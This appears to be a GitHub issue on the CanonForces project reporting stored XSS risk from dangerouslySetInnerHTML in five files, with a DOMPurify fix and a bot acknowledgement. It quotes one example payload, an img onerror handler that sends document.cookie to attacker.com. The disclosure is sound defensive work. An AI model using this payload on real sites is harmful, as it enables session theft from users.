XSS: dangerouslySetInnerHTML renders unsanitized problem statements

[amaydixit11]

Issue

After reviewing the code, dangerouslySetInnerHTML is used in 5 locations to render problem descriptions that could come from Codeforces API, admin input, or other external sources.

Affected Files

File	Line	What's Rendered
src/pages/potd.tsx	258	formatDescription(truncatedDesc)
src/pages/questions/[id].tsx	447-449	formatDescription(ques.description)
src/pages/questions/[id].tsx	458-460	formatDescription(ques.input_format)
src/pages/questions/[id].tsx	469-471	formatDescription(ques.output_format)
src/components/ProblemOfTheDay.jsx	8	formatDescription(problem.description)

Attack Vector

If any problem description contains HTML with <script> tags or event handlers (from Codeforces API, or an admin accidentally pasting HTML), it will execute in the browser:

<img src=x onerror="fetch('https://attacker.com/'+document.cookie)">

Fix

Install DOMPurify and sanitize before rendering:

npm install dompurify

import DOMPurify from 'dompurify';

// Replace:
<div dangerouslySetInnerHTML={{ __html: formatDescription(desc) }} />

// With:
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(formatDescription(desc)) }} />

This affects all 5 locations listed above. Same fix pattern applies to each.

[github-actions]

🚀 Thanks for Helping Improve CanonForces!

We'll review it as soon as possible. We truly appreciate your contributions to CanonForces! ⚔️✨

✅ Before working on a PR, please:

• Read our README.md, CONTRIBUTING.md.
• Wait until the issue is assigned to you before starting a PR.
• Discuss your approach if you're unsure, we're happy to help!

💬 Need quick support or want to discuss ideas?
Join our Discord 👉 CanonForces Discord

Thanks again, @amaydixit11! 🎉